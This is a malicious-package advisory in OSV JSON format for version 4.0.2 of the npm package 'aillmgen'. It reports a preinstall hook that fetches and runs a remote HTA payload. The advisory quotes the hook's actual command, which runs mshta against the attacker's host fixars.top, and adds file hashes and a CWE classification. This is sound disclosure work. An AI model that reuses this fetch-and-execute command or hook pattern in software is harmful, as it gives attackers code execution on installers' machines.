{"id":"MAL-2026-5927","summary":"Malicious code in aillmgen (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341)\nOn `npm install`, the package's preinstall hook (preinstall.js) runs `exec('cmd /c \"mshta http://fixars.top\"')`, invoking the Windows mshta.exe binary to fetch and execute an HTA payload from http://fixars.top with the installer's privileges. mshta is a well-known living-off-the-land binary that executes arbitrary HTA/JScript/VBScript content directly from a remote URL, giving the operator of fixars.top remote code execution on any Windows machine that installs this package. The remote endpoint is plain HTTP and attacker-mutable, and the behavior is unrelated to the package's stated LLM-client purpose (the library code references an EasyLLMClient targeting api.easyllm.ai while the package itself is published under the unrelated name `aillmgen` with empty author and description metadata).\nThe combination of install-time RCE, plaintext attacker-controlled fetch-and-execute, impersonation of an LLM-client utility, and placeholder publisher metadata is a supply-chain dropper.\n","modified":"2026-06-16T22:31:49.121604172Z","published":"2026-06-16T22:09:54Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-006837","source":"amazon-inspector","sha256":"5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341","versions":["4.0.2"],"import_time":"2026-06-16T22:17:36.229900342Z","modified_time":"2026-06-16T22:09:54Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/aillmgen/v/4.0.2"}],"affected":[{"package":{"name":"aillmgen","ecosystem":"npm","purl":"pkg:npm/aillmgen"},"versions":["4.0.2"],"database_specific":{"indicators":{"package_integrity":[{"filename":"aillmgen-4.0.2.tgz","hashes":{"sha512_sri":"sha512-/xoVe3G6bgDxVKZL0AzmWznijt4WejB7NioxzFLzY/toq/W7HnkE7/QljuglUa2M1nPu9RawnDh7ceULiijFnA==","sha1":"e558ff2c70c4434472e0f213073faf72c1accd8e"}}],"evidence_files":[{"tlsh":"70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd","path":"preinstall.js","sha256":"6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889"},{"tlsh":"2ed02e388da3e93328c006620c2a9056b2e08f0f04143c0da3cf192c469e673b8ff31e","path":"package.json","sha256":"8c76bc8aabe8bdbe6f4056c99588096e8cdf7a3d8b15cdbc0beb4d136f057966"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/aillmgen/MAL-2026-5927.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}